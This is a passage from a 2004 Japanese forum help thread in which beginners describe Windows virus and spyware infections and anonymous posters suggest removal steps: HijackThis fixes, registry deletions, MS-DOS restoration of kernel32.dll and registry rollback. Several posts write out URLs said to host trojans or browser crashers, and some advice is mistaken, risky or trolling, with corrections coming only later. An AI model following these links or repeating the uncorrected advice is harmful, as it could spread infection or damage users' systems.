O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [MemoryIdle] C:\Program Files\Memory Booster\Memory Booster.exe -PowerOn
O4 - HKLM\..\Run: [INETCONDSP] C:\Program Files\Fujitsu\iNetConDsp\iNetConDsp.exe
O4 - HKLM\..\Run: [BATTERYAID] C:\Program Files\Fujitsu\BATTERYAID\BATTERYAID.exe
O4 - HKLM\..\Run: [YAMAHA AC-XG Power Utility] yacpower.exe
O4 - HKLM\..\Run: [IndicatorUtility] C:\Program Files\Fujitsu\IndicatorUtility\IndicatorUty.exe
O4 - HKLM\..\Run: [WinHandAutoClean] "C:\Program Files\WinHand\AUTOCLN.EXE"
O4 - HKLM\..\Run: [System] C:\WINDOWS\Exploder.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [HDD-Nonクラッシュ] C:\Downloads\hddno132\hddnon.exe
O4 - Startup: ごみ箱自動削除ツール.lnk = C:\Program Files\DustDel\DustDel.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE

358 :ひよこ名無しさん:04/07/23 12:37 ID:???
>>357
被害対策さんの所には相談されましたか?

359 :被害対策さん:04/07/23 12:38 ID:???
>>358
いえ、まだです

360 :ひよこ名無しさん:04/07/23 12:41 ID:a43c28Ez
NullPorce2MX.exeみたいです。

361 :ひよこ名無しさん:04/07/23 12:42 ID:???
>>359
アダルトサイト被害対策の部屋
http://higaitaisaku.web.infoseek.co.jp/cgi-bin/cbbs.cgi?mode=alk&no=0

362 :ひよこ名無しさん:04/07/23 12:46 ID:???
04だけ貼ってもダメだろ。

363 :ひよこ名無しさん:04/07/23 12:48 ID:???
>>360
>>361のリンク先に行け。

364 :ひよこ名無しさん:04/07/23 12:54 ID:???
>>362
>>339 の指示に従った書き込みだろ。

365 :ひよこ名無しさん:04/07/23 12:55 ID:nMHgKheo
初心者板から来ました

デスクトップにはアイコンもバーも何も表示されず
alt+ctrl+delの新しいタスクからプログラムを起動している状況です
ウイルススキャンには
TROJ/DLOADER.F 一つ
TROJ/AGENT.G 3つ
JS/STARTPAG.AD 4つが検出され、隔離されています
手動で削除する方法がわからないのと、それで解決になるか不安です
解決方法、参考を知っていましたらお願いします
OSはXPです

366 :365:04/07/23 12:59 ID:???
エロサイト見たら…助けてください!Part33
http://pc6.2ch.net/test/read.cgi/pcqa/1090357530/l50
から来たのですがどっちも初心者板でした 恥
よろしくお願いします

367 :ひよこ名無しさん:04/07/23 13:03 ID:???
>>365
悪いが どこで聞いても回答者は同じだw

368 :365:04/07/23 13:05 ID:???
>>367
マジですか?
アダルトサイト被害対策の部屋
http://higaitaisaku.web.infoseek.co.jp/caution.html
に行ってきた方が良いでしょうか?

369 :ひよこ名無しさん:04/07/23 13:09 ID:???
>>368
こことマルチしてもいいですから相談してみてください。

370 :ひよこ名無しさん:04/07/23 13:11 ID:???
>>365
気が向いたら報告に来てね。

371 :365:04/07/23 13:13 ID:???
>>369
わかりました。行ってきます
ありがとうございました

372 :ひよこ名無しさん:04/07/23 13:56 ID:???
>>357
O4 - HKLM\..\Run: [System] C:\WINDOWS\Exploder.exe

Exploderのスペルに注目してください。明らかに偽者です。
本物はExpolerだし、本来Runには必要ありません。

また下の情報も見てみることもお勧めします。
【警報】Winnyを狙ったワーム・ウイルス情報 Part22
ttp://tmp4.2ch.net/test/read.cgi/download/1089460762/519-520

373 :372:04/07/23 14:09 ID:???
>>357
ウイルスの治療ですがこれで隔離できるかも知れません。

HijackThis以外を全て閉じて
O4 - HKLM\..\Run: [System] C:\WINDOWS\Exploder.exe
にチェックを入れてFixして再起動してください。
再起動した後はC:\WINDOWS\Exploder.exeを、
リネームしたりゴミ箱に移したりしてみて様子を見ましょう。
状態を見るとトロイ型ぽいので、それで何とかなるかも知れません。

後はウイルス定義が追いついてくるまで静かに待ちましょう。

374 :ひよこ名無しさん:04/07/23 14:19 ID:CcqOPtX/
これって安全なファイルですか?
http://pcqa.s3.xrea.com/upload/source/up0100.jpg

375 :ひよこ名無しさん:04/07/23 14:25 ID:???
>>374
その依頼でしたら鑑定スレでどうぞ。
ラウンジにて鑑定や勇気などで検索してみてください。

376 :ひよこ名無しさん:04/07/23 14:29 ID:???
>>374
この板の鑑定スレはこのスレ
http://pc6.2ch.net/test/read.cgi/pcqa/1088646245/

377 :ひよこ名無しさん:04/07/23 14:31 ID:CcqOPtX/
>>375
サンクス
役所のたらいまわしみたいだな

378 :コマッタチャン:04/07/23 14:43 ID:5W5npSCn
>>372
ありがとうございました。
カプラ!

379 :ひよこ名無しさん:04/07/23 14:43 ID:nbisEDiz
PC初心です。
ウイルス感染してしまい、メール受信ができません。
同じメールが何十回も受信されてきます。
ウイルススキャンをしたら、トロイの木馬と書いてあります。
どうしたらよいでしょうか??
昨日から今まで奮闘しても、結局何の解決もしてません。
どうか、教えてください。
ウイルスはフグリ(キャン玉)ウイルスです。

380 :ひよこ名無しさん:04/07/23 14:44 ID:???
>>379
でもなんでホムペをアーカイブするの?

381 :ひよこ名無しさん:04/07/23 14:48 ID:???
>>379
ここで釣りするな

382 :ひよこ名無しさん:04/07/23 14:50 ID:???
>>374
ウィルス+無限ループブラクラ

383 :ひよこ名無しさん:04/07/23 14:52 ID:???
最近、ファイルを開いても中身が見えなくなってしまいました、別に中身を消したわけでもなく、ちゃんと存在はしているようなのですが
クリックする対象が見当たりません、さらにスキャンディスクをしようとしてもエラーが出てスキャンが終わりません。
挙句の果てにウイルススキャンも同じように終わりません、誰かおたすけ〜^^;

384 :ひよこ名無しさん:04/07/23 14:52 ID:???
>>383
窓の手使え。

385 :ひよこ名無しさん:04/07/23 14:54 ID:???
>>383
インストールCD使え

386 :ひよこ名無しさん:04/07/23 20:23 ID:???
380あたりまでなかなか紳士的な流れでしたね。

387 :ひよこ名無しさん:04/07/23 23:33 ID:ag+ekTaV
ウィルス駆除するため
レジストリキーを削除しようとしてるのですが
HKEY_CLASSES_ROOT\CLSID\{486E48B5-ABF2-42BB-A327-2679DF3FB822}
を消去する場合、このフォルダごと消去してもよろしいのでしょうか?
このフォルダに入ってるファイルのみを消去するのでしょうか?
教えてくださいお願いします。

388 :ひよこ名無しさん:04/07/23 23:35 ID:???
>>387
{ の前に ; をつければ無効にできる。
これで異常がなければ、{ 以下を削除してもいい。
CLSIDは必要だから消すなよ。

389 :387:04/07/23 23:47 ID:ag+ekTaV
>>388
レスありがとうございます。
最後に確認をしたいのですが(レジストリいじるの本当に怖いので)
まず { の前に ; をつけて異常がないことを確認してから
{486E48B5-ABF2-42BB-A327-2679DF3FB822}
というフォルダを消せばいいのですよね?

390 :ひよこ名無しさん:04/07/23 23:53 ID:???
>>389
それでいい。
フォルダじゃなくて、キーの値だけどね。

391 :387:04/07/23 23:58 ID:???
>>390
ありがとうございました。
たぶんこれで駆除にとりかかれそうです。

あれそのままキーっていってよかったんですね。
アイコンがいつも見てるフォルダだったものでフォルダだと思ってました^^;

392 :ひよこ名無しさん:04/07/24 00:04 ID:???
レジストリキーの扱いには十分注意しましょう!

ベンダーサイトのウィルス感染時の処置で必ずこの一行があるけど、
実際には、いじるレジストリの場所が問題であって、多くの場合間違ったって、起動不能になんて陥りませんよ。
びくびくしながら、ガンガンやっちゃって下さい。
そのうちに、こんなもんなのかと実感するでしょう。

でも本当のことを言うと、レジストリのバックアップを定期的に取らないのは、間違っていますからね。
やり方覚えてください。.regファイルの書き出しではないですよ。

393 :ひよこ名無しさん:04/07/24 20:45 ID:0Tfs9N3i
タスクバーに表示されてる「ネットワーク接続アイコン」って
何もしてない時に点滅してるとウイルスにやられてる場合が
あると言いますが・・・1回でも点滅すりゃヤバイって事なんでしょうか?

一応ウイルススキャンとスパイウエアの駆除もして異常は無かったんですが、
ふと気付くとタスクバー点滅してることが結構あるんです。

394 :ひよこ名無しさん:04/07/24 20:47 ID:???
>>393
点滅しているのが普通だと思いますけど

395 :393:04/07/24 20:54 ID:0Tfs9N3i
そういうもんですか・・・ウイルススキャンって言っても
ソースネクストなんで心配してたんですが、分かりました。

396 :ひよこ名無しさん:04/07/24 23:30 ID:???
>>395
ごみパケットが来ている時には、そうなります

397 :ひよこ名無しさん:04/07/25 02:15 ID:QrgkxDHL
win98使いです。
バスターでウイルススキャンをしたところ
DIAL JAPEXA
というウイルスが検出され、隔離しています。
どういうウイルスかググってもでてきません。

どういうウイルスなのか
どなたかご存知の方いませんか?



398 :ひよこ名無しさん:04/07/25 02:16 ID:???
   、_人_人_人_人_人_人_人_人_人_人_人_,
  、_)                       (_
   _)  夏  厨   警   報  !! (_
   _)                     (
   '⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒`
                   //
           ヘ,(゚∀゚)y'^     アーヒャ ヒャ ヒャ ヒャ ヒャ
          、  _L_;二;_.j_  , \\
           ̄ ト、~Y~,/| ̄
             ,|yΛ=スイ|、   アーヒャヒャヒャ   _
             ' | | !;∀Y i| `          /##;〉
           |イYト〉イY.|           /  ̄
   アヒャヒャ     レYy'`vレ|     ヽ(゚∀゚ )ノ
            Vy  V'       ( 厨)ヘ
   ヽ( ゚∀゚)ノ               <
     (夏 )ヘ
     <

399 :ひよこ名無しさん:04/07/25 02:17 ID:???
>>397
たぶん接続先改変

400 :ひよこ名無しさん:04/07/25 02:22 ID:QrgkxDHL
>>399
ありがとうございます。


401 :ひよこ名無しさん:04/07/25 09:50 ID:c4vFKnNn
TVの実況板開く度にunix.penguinてのがノートンで警告くるんですが気にする必要ないですか?

402 :ひよこ名無しさん:04/07/25 09:50 ID:???
>>401
放っておけ。

403 :ひよこ名無しさん:04/07/25 09:52 ID:???
>>402
了解です。ありがとうございました。
2ch見てるとよくありますね。

404 :ひよこ名無しさん:04/07/25 12:57 ID:SrT90uwR
ttp://www.albinoblacksheep.com/flash/open.html
ここを誤って開いてしまいましたが、ウィルスツール(AVG)が反応して、吃驚したんですが、感染してしまったらどう対処すればいいのでしょうか

405 :ひよこ名無しさん:04/07/25 12:59 ID:???
>>404
ウィルススキャンをして駆除。
個別にはウィルスデータベースを参照して手動で駆除。

406 :ひよこ名無しさん:04/07/25 15:36 ID:???
>>404
■アダルトサイトは安全?危険?
http://www.geocities.jp/kazu1994_jp/bura.html
えっと驚く前に―国際電話・Q2からの事前防御策―
http://www.coolce.com/web/kongbu.htm
アダルトサイト被害対策の部屋
http://higaitaisaku.web.infoseek.co.jp/caution.html

407 :ひよこ名無しさん:04/07/25 15:38 ID:???
    |┃三   人      _____________
    |┃   (_ )    /
    |┃ ≡ (__) < >>406 ブラクラ貼るな、蛆虫、氏ね!
____.|ミ\__( ・∀・)  \
    |┃=__    \    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    |┃ ≡ )  人 \ ガラッ

408 :ひよこ名無しさん:04/07/25 18:47 ID:???
>>404
AVGが対応していて反応したものだと思われるが、
「You are an idiot!」ならただのブラクラだから、
インターネットオプション > ファイルの削除 >すべてのにチェック
で削除してIEのキャッシュをクリアーすれば大丈夫のはず。

409 :ひよこ名なしさん:04/07/25 23:12 ID:???
あの、すいません。2〜3日前にブラクラを踏んだらしく、
JS/STARTPAG.AD が10個ほど検出されるようになりました。
隔離して削除してもすぐに復活して手の施しようがないのですが・・・
それと、デスクトップのアイコンは表示されますが、フォルダを開くと中身のファイルの、
アイコンは表示されません。起動も5〜6回に一度しか安定しません。
JS/STARTPAG.ADの削除の仕方を教えてください。お願いします。


410 :ひよこ名無しさん:04/07/25 23:14 ID:???
>>409
ドレンドマイクロのサイトで JS_STARTPAG.AD で検索すれば
詳しく説明されています。

411 :ひよこ名無しさん:04/07/25 23:48 ID:TB8MEdG6
すいません、Windows98です。
今トレンドマイクロでオンラインスキャンした所、
VBS_REDLOF.Aというウイルスが87個みつかりました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A
↑の感染していた場合の対処、のところに
レジストリエディタなどを使って
レジストリ値、レジストリキーを削除するとあるのですが、
これはどうやればできるんでしょうか…
「レジストリエディタ」はどうやれば使えるんでしょうか。

412 :ひよこ名無しさん:04/07/25 23:52 ID:GYC7f1xP
>>88にもでてましたが、VBS.Internalに感染してしまいました。
最初は誤反応かと思っていたのですが、ローカルのhtmlファイルのアイコンがすべてIEのマークじゃなくなってしまいました。
感染ファイルはノートン先生が削除してくれたのですが、上記の現象を解決するにはどうしたらいいのでしょうか?

413 :ひよこ名無しさん:04/07/25 23:52 ID:???
>>411
http://higaitaisaku.web.infoseek.co.jp/regedit.html
レジストリエディタ(regedit)の使い方

でも、REDLOF にやられたら、データをバックアップしてリカバリしたほうがいいかも。

414 :ひよこ名無しさん:04/07/25 23:57 ID:???
>>412
htmlのファイルは「e」マークでいいんですよ
VBS.Internalはネット上でうようよいる風邪のウィルスみたいな軽い不正プログラムなのでそんなに気にしなくていいと思う。

415 :ひよこ名無しさん:04/07/26 00:03 ID:???
>>411
最悪かもな
どうしようもない場合は、CDのcabsフォルダか、windows\options\cabsフォルダから、
kernel32.dllをwindows\system内に復元しなければならない。

起動出来るのなら、フロッピーにでもコピーして
MS-DOSモードで復元してやればいい。

416 :412:04/07/26 00:11 ID:???
>>414
早速のレス有難うございます。

>htmlのファイルは「e」マークでいいんですよ
その「e」マークが表示されないのです(泣
ファイルを開くプログラムを選択していないときにでるアイコンのままです。
IEで常に開くように指定しても表示がかわらない状態です。。

417 :ひよこ名無しさん:04/07/26 00:12 ID:???
>>416
htmlの関連付けがおかしいのでは?

418 :ひよこ名無しさん:04/07/26 00:13 ID:???
>>416
質問者は、メール欄を空欄にしてIDを出してください。

OSは何ですか。
フォルダの「ツール」メニュー「フォルダオプション」の
「ファイルの種類」で、HTMLの「詳細設定」でアイコンの設定を確認。
一度セーフモードで起動するなど、アイコンキャッシュのクリア

419 :411:04/07/26 00:17 ID:zFJ+90QL
>>413
レスありがとうございます。
とりあえず、そこを参考にしてやってみます。

>>415
レスありがとうございます。
とりあえず上の方法でやってみます…。

それは「CDのcabsフォルダか、windows\options\cabsフォルダ」に書いてある
「kernel32.dll」というレジストリキーをレジストリエディタで見て、フロッピーかなんかにコピーして、
windows\systemという所(レジストリ)に書きこむということですか?

その作業がMS-DOSモードでないとできない。ということですか?

420 :ひよこ名無しさん:04/07/26 00:24 ID:???
>>419
>その作業がMS-DOSモードでないとできない。ということですか?

だって、システムファイルを上書きするんですよ
そこまで、やっといた方がいいと思うけどなあ

421 :412:04/07/26 00:26 ID:???
>>417
>>418
レス有難うございます。

OSはXP HomeEditionです。
htmlの関連付けはブラウザがSleipnirをつかっていましてそれにしています。
一応IE、元に戻すにしてみたのですが、アイコンは変わらずです。。

422 :ひよこ名無しさん:04/07/26 00:30 ID:???
>>421
アイコンをクリックすると普通に開くの?

423 :412:04/07/26 00:31 ID:???
すみませんID非表示のままでした。

424 :ひよこ名無しさん:04/07/26 00:32 ID:???
>>419
インストールCDの場合
CDのcabsフォルダの中にkernel32.dllというファイルがある

メーカー製リカバリーディスクの場合
windows\options\cabsフォルダの中にkernel32.dllというファイルがある

extractで展開するのは難しいだろうから、explorerで開いてみる
そして、ファイルが見つかったら、フロッピーディスクにコピーする

MS-DOSで
copy a:\kernel32.dll c:\windows\system32\kernel32.dll

425 :ひよこ名無しさん:04/07/26 00:36 ID:???
>>419
わからんがこの辺り
CABS\WIN_15.CAB\KERNEL32.DLL

426 :424:04/07/26 00:40 ID:???
訂正 間違った
MS-DOSで
copy a:\kernel32.dll c:\windows\system\kernel32.dll


427 :419:04/07/26 00:41 ID:zFJ+90QL
>>420
レスありがとうございます。
わかりました。

>>424
レスありがとうございます。
印刷しておきます。
メーカー製PCなので
「メーカー製リカバリーディスクの場合
windows\options\cabsフォルダの中にkernel32.dllというファイルがある 。」の方かな。

正直に言うとMS-DOSモードがなんなのか全く知らないんですが…
Windowsセーフモードみたいなものでしょうか…

>>425
レスありがとうございます。
印刷しておきます。

428 :412:04/07/26 00:42 ID:???
>>422
ファイルは普通に見れます。

429 :ひよこ名無しさん:04/07/26 00:44 ID:???
>>427
【Windows 95・98にてMS-DOSモードで起動するには】
Windows Startup Menu (起動メニュー) で[Command Prompt Only]を選択してください。

430 :ひよこ名無しさん:04/07/26 00:44 ID:???
>>428
それこそ窓の手で直らない?

431 :412:04/07/26 00:48 ID:ErzMEsQX
>>428
レス有難うございます。

窓の手ですね。
これからちょっと調べて試してみます。

有難うございます。

432 :411=419=427:04/07/26 00:53 ID:zFJ+90QL
>>426
訂正ありがとうございます。
印刷しておきます。

>>429
レスありがとうございます。
印刷しておきます。
なるほど、セーフモードの時と同じようにF8を押して軌道メニューに入り、
そこでSafemodeじゃなく「Command Prompt Only」をおせばばいいいのか。
Windows98の終了メニューの一番下に「MS-DOSモードで再起動する」という選択があるんですが。
そこでもだいじょうぶですよね。

Command Prompt Onlyということは「PCの操作を全部コマンドを打ちこんでやっていくようなモード」
ということですか?

問題の個所までたどりつけるだろうか…

433 :ひよこ名無しさん:04/07/26 00:58 ID:DvR64oDd


147 名前:就職戦線異状名無しさん 投稿日:04/07/24 01:04
http://x.full-tgp.net/?ms.com

何かコレ読んだら、アパレルの実体がわかったみたいで
すげー怖くなった・・・・
お前らどう思う?


↑上のウイルスにひっかかりました。
トロイらしいんですがこのウイルスはどういったないようのウイルスなんでしょうか?
対策も教えてください。お願いしますm(_ _)m

434 :ひよこ名無しさん:04/07/26 01:01 ID:???
>>433
直リンして被害増やしたいのか?死ねよ。

435 :ひよこ名無しさん:04/07/26 01:02 ID:DvR64oDd
>>434
すいませんそういう気はないです
アドレスがわかったほうがどういったウイルスなのか説明しやすいと思いまして

436 :ひよこ名無しさん:04/07/26 01:02 ID:???
>>435
別に直リンする必要ないだろ?

437 :ひよこ名無しさん:04/07/26 01:05 ID:DvR64oDd
>>436
すいませんでしたm(_ _)m

438 :ひよこ名無しさん:04/07/26 01:06 ID:???
>>437
名前欄に最初の質問レス番号を入れろ。ルールを守れ。

・ウィルススキャンをして駆除。
・ウィルス名をデーターベースで検索して駆除。


439 :433:04/07/26 01:07 ID:DvR64oDd
>>438
ありがとうございます。
ウイルス名はどうやって検索すればわかるんですか?

440 :ひよこ名無しさん:04/07/26 01:08 ID:???
>>432
>Windows98の終了メニューの一番下に「MS-DOSモードで再起動する」という選択があるんですが。
>そこでもだいじょうぶですよね。

OK

424さんが>>426で書いてくれてる通りに打ち込んでけば大丈夫
スペースとかに気をつけて

>>433
踏んで調べろとでも?
アンチウィルスソフト入ってないならオンラインスキャンしろよ

441 :ひよこ名無しさん:04/07/26 01:09 ID:???
>>439
スキャンしろと書いてあるべ

442 :433:04/07/26 01:10 ID:DvR64oDd
>>440
ソースネクストのウイルスセキュリティ2004てのをいれてたんですが・・・
一応ウイルススキャンしています。

443 :ひよこ名無しさん:04/07/26 01:12 ID:???
>>433
わざとか? 5連発位だな
Iframe系のトロイは、過去のセキュリティホールを突いてくるスクリプトを含んでいる。
通常パッチを当てていれば感染しないのだが、まれに一つ二つ無断でインストールされる事がある。
大抵は常駐シールドで遮断してくれるのだが、世の中広いからねえ。

444 :ひよこ名無しさん:04/07/26 01:12 ID:???
>>442
ウィルス定義ファイルは最新か?

ソースネクストのは安いからそうしたんだろうが、余り評判よくないね。
検索されなかったらトレンドマイクロかシマンテックのオンラインスキャンも試せ。

でてこなけりゃそれはそれでいいが、スパイウェアも疑うと万全。

とりあえず、検索結果待ちな。

445 :433:04/07/26 01:14 ID:DvR64oDd
>>443
タグがたくさんでてきそうになって、
このプログラムを許可しますか?っていうファイアウォールのあれがでて
一応ブロックするにしてすぐ回線切ったんですが・・・
4ヶ月くらいアップデートしていないウイルススキャンで調べてるんですが
これでウイルス検出されなかったら大丈夫ですかね?

446 :433:04/07/26 01:15 ID:DvR64oDd
>>444
最新じゃないですORZ

ありがとうございます。終わったら一応オンラインスキャンします

447 :ひよこ名無しさん:04/07/26 01:15 ID:???
>>445
4ヶ月前なんて駄目に決まってるだろ。さっさとキャンセルしてアップデートしろや。



448 :411=419=427=432:04/07/26 01:20 ID:zFJ+90QL
>>440
レスありがとうございます。
印刷しておきます。

>424さんが>>426で書いてくれてる通りに打ち込んでけば大丈夫
>スペースとかに気をつけて
わかりました。

がんばってレジストリを見ます。
質問に答えてくれた方本当にありがとうございました。

449 :433:04/07/26 01:29 ID:DvR64oDd
>>447
あ、そうします。オンラインスキャンでも検出されなかったら安心してよろしいでしょうか?
スパイウェアの検査はどうすれば?

450 :ひよこ名無しさん:04/07/26 01:52 ID:???
うんこ

451 :ひよこ名無しさん:04/07/26 01:56 ID:???
>>449
ちょっと、ダウンロード先がややこしいので
わけわかめになっている人は、このリンクからダウンロードして下さい

SPYBOT
http://www.download.com/3000-2144-10122137.html?part=104443&subj=dlpage&tag=button

Ad-aware
http://www.download.com/3000-2144-10045910.html?part=69274&subj=dlpage&tag=button

452 :ひよこ名無しさん:04/07/26 01:57 ID:???
>>451 偽リンク踏むな

453 :411=419=427=432=448:04/07/26 01:59 ID:zFJ+90QL
ん…?なんかおかしい。

トレンドマイクロのサイトで言われたものを削除しようとしたんですが、
↓のようなレジストリの値はないみたいなんですが…
検索してもありませんでした。

1) Windowsのレジストリエディタ(regedit.exe)などを使用して以下のレジストリ値を削除してください:
場所: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
値:Kernel32="<Windowsシステムディレクトリ>\Kernel.dll"

2) 以下のレジストリキーを削除してください:
HKEY_CLASSES_ROOT\dllfile\Shell

HKEY_CLASSES_ROOT\dllfile\ScriptEngine

HKEY_CLASSES_ROOT\dllfile\ShellEx

HKEY_CLASSES_ROOT\dllfile\ScriptHostEncode

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersionの次には「run」しかみあたらず、
それの中にも上のような値はないし。
HKEY_CLASSES_ROOTの次には「dll」しかみあたらなくて、
その中にも上のような値はありません…

454 :ひよこ名無しさん:04/07/26 02:05 ID:???
>>451はウイルス


455 :ひよこ名無しさん:04/07/26 02:12 ID:???
>>453
ん、右側に展開されているキーとその値の中になかった?
もしないとすると、感染ファイルだけが存在しているのかもしれない。
運が良ければ、まだ発病していないかもしれない。

発見されたのが、Temporary Internet Filesの中だったら、
インターネットオプションから全部削除してよし。

456 :ひよこ名無しさん:04/07/26 02:49 ID:FDUxCpwm
すいませんパソコンがおかしいんですけど・・・
ウイルスっぽいです・・

457 :411=419=427=432=448=453:04/07/26 02:54 ID:UVBGSu1s
>>455
こんな夜更けににもかかわらずレスありがとうございます。
削除に夢中になっていて、レスが遅れてすいません。

>>453 を書いてからトレンドマイクロで「感染してるぞ」と言われたファイルを1つ1つごみ箱にうつして捨てました。
87個感染ファイルが見つかったんですが、1つ(C\WINDOWS\SYSTEM\Kernel.dll)以外はなんとか削除できたようです。

しかしこの C\WINDOWS\SYSTEM\Kernel.dll は削除してはいけないんですよね。

でもレジストリの感染した値は見つからないし…どうしよう…


あと、削除していて FOLDER.HTTという名前のファイル や 変なhtmlファイル が、フォルダの1つ1つに入りこんでいる
パターンが多かったんですが、その FOLDER.HTT がまだコンピュータ内にちらほら存在していて怖いです。
こんなの感染する前はなかったし…でも表示されなかったし…
ウイルスと同時期に出てきたdesktopとかいうテキストファイルも不気味だ。FOLDER.HTTと必ず一緒にあったし…

458 :ひよこ名無しさん:04/07/26 02:56 ID:FDUxCpwm
spywareってのなんですか?
どなたかおしえてくれませんか・・
どうしよ・・

459 :ひよこ名無しさん:04/07/26 02:57 ID:???
>>458
ウイルスです。

460 :ひよこ名無しさん:04/07/26 02:57 ID:???
>>458
用語は自分で検索しろ
http://e-words.jp/w/E382B9E38391E382A4E382A6E382A7E382A2.html

461 :ひよこ名無しさん:04/07/26 03:01 ID:FDUxCpwm
>459
やっぱり・・
ありがとうございます

>460
すいません。何か良い手はあるのでしょうか?
あつかましくてすいません

462 :ひよこ名無しさん:04/07/26 03:02 ID:???
>>461
駆除の仕方はここにまとめてる。
エロサイト見たら…助けてください!Part33
http://pc6.2ch.net/test/read.cgi/pcqa/1090357530/1-10

463 :ひよこ名無しさん:04/07/26 03:02 ID:???
>>461
窓の手使え。

464 :ひよこ名無しさん:04/07/26 03:02 ID:???
>>463
チロウ

465 :ひよこ名無しさん:04/07/26 03:03 ID:???
>>464
お前に煽りは無理。

466 :ひよこ名無しさん:04/07/26 03:04 ID:FDUxCpwm
>462
ほんとにすいません
ありがとうございます
パソコンの事かなりの無知でして助かります。

467 :ひよこ名無しさん:04/07/26 03:05 ID:???
スパイウェアと言っても色々あってホント分らんね。ホームページを勝手に書き換えるものとか右クリックメニューに勝手になるものとか

468 :ひよこ名無しさん:04/07/26 03:05 ID:???
>>465
煽りはスピードが猪木

469 :ひよこ名無しさん:04/07/26 03:09 ID:FDUxCpwm
>467
そうですか。
何回ホームのサイトをヤフーにしても変なのにかわったり
お気に入りにも消しても消してもアダルトサイトのフォルダが
あるんです・・


470 :ひよこ名無しさん:04/07/26 03:11 ID:???
>>469
エロサイト見たら…助けてください!Part33
http://pc6.2ch.net/test/read.cgi/pcqa/1090357530/

471 :411=419=427=432=448=453=457:04/07/26 03:12 ID:UVBGSu1s
>>455
Temporary Internet Filesの中からは発見されませんでした。念のためにキャッシュは捨てました。

C\WINDOWS\SYSTEM\Kernel.dllを削除するわけにはいかないし、
感染を示すレジストリの値はみつからないし、
放置したりしたら本格的な被害が始まってしまうし…


どうすればいいでしょうか…?

472 :ひよこ名無しさん:04/07/26 03:17 ID:???
>>471
窓の手使え。

473 :ひよこ名無しさん:04/07/26 03:22 ID:???
>>471
ダメ元でイロイロ試すしかない。

(一番古い日付は不可)

パソコンの電源を入れたら[Ctrl]キーを押しっぱなしにする
“Startup Menu”が表示されたら“Command Prompt Only”(コマンドプロンプトのみ)を選択する
入力可能状態になったら、“scanreg”と入力してから[Enter]キーを押す
日付の一覧が表示されるので、その中で復元したいと思うバックアップデータを選んで[Enter]キーを押す
再起動を求められるので、再起動する


Redlof.A(通称レッドロフ)専用のワクチンソフトです。
http://hp.vector.co.jp/authors/VA029423/winsoft.htm

474 :411=419=427=432=448=453=457=471:04/07/26 03:34 ID:UVBGSu1s
>>473
こんな夜更けににもかかわらずレスありがとうございます。

>(一番古い日付は不可)

>パソコンの電源を入れたら[Ctrl]キーを押しっぱなしにする
>“Startup Menu”が表示されたら“Command Prompt Only”(コマンドプロンプトのみ)を選択する
>入力可能状態になったら、“scanreg”と入力してから[Enter]キーを押す
>日付の一覧が表示されるので、その中で復元したいと思うバックアップデータを選んで[Enter]キーを押す
>再起動を求められるので、再起動する
わかりました。やってみます。

Redlof.A(通称レッドロフ)専用のワクチンソフトも試してみます。
まだワームらしきものがたくさんあるので。

475 :ひよこ名無しさん:04/07/26 05:06 ID:???
>>471>>474
C\WINDOWS\SYSTEM\Kernel.dll
これは、デフォルトのOSには存在しないファイルだから、削除していいよ。
消してはダメなのは、こっち
C\WINDOWS\SYSTEM\KERNEL32.DLL

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A&VSect=T

・システム改変:
 Windowsディレクトリに"WSCRIPT.EXE"がある事を確認すると、Windowsシステムディレクトリに"KERNEL.DLL"のファイル名で自身のコピーを作成します。
 "WSCRIPT.EXE"が見つからなかった場合はWindowsディレクトリ\systemに"KERNEL32.DLL"のファイル名で自身のコピーを作成します。これらのファイルは「VBS_REDLOF.A.GEN」の名称で検出されます。

自分で貼ったリンクの詳細の所の記述だよ

C\WINDOWS\SYSTEM\KERNEL32.DLL
スキャンしてウィルス認定されなければ、これは書き替えなくてもいいよ。

476 :411=419=427=432=448=453=457=471=474:04/07/26 05:15 ID:XpCud9Vv
>>473
Redlof.A(通称レッドロフ)専用のワクチンソフト使いました。
ありがとうございました。
レジストリの感染している部分は直った。と表示されました

>>475
ありがとうございます!!
今まさに「Kernel.dll(感染)って普通に削除しちゃだめですか?」という内容の書きこみをしようとしていたところでした。
すいません…起動に使うフォルダと関連しているので消したらダメだと決め付けていました…。
本当にありがとうございます。

477 :ひよこ名無しさん:04/07/26 12:14 ID:I6O4w+IW
tp//masaton1900.at.infoseek.co.jp/moemoe.htm
↑↑何かのウィルスだと思うので絶対踏まないで下さい!!

一昨日あたり自分は↑を踏んでしまい何かのウィルスに感染してしまいました。
ですが初心者なので何がおきてるかさっぱりわかりません。

1行目のアドレス(ウィルス)についてわかる方、
是非とも対応や状況説明をアドバイスをお願いします!

478 :ひよこ名無しさん:04/07/26 12:37 ID:???
>>477
ソース見たけど、いろいろなサイトから取り込んでいるようなので
数種類に感染しているんじゃないかな。
流石にクリックして確認したくないからね。

479 :ひよこ名無しさん:04/07/26 12:37 ID:???
>>477
ウィルススキャンしろ。

480 :ひよこ名無しさん:04/07/26 13:15 ID:???
Unix.Penguin に感染しました。どうしましょう。

481 :ひよこ名無しさん:04/07/26 13:22 ID:???
>>480
2ちゃんで食らったなら、誤反応を利用したイタズラ。
それとも、Linuxのサーバをノーガードで運用してるのか?

482 :ひよこ名無しさん:04/07/26 13:26 ID:t53Ckbxu
>>481
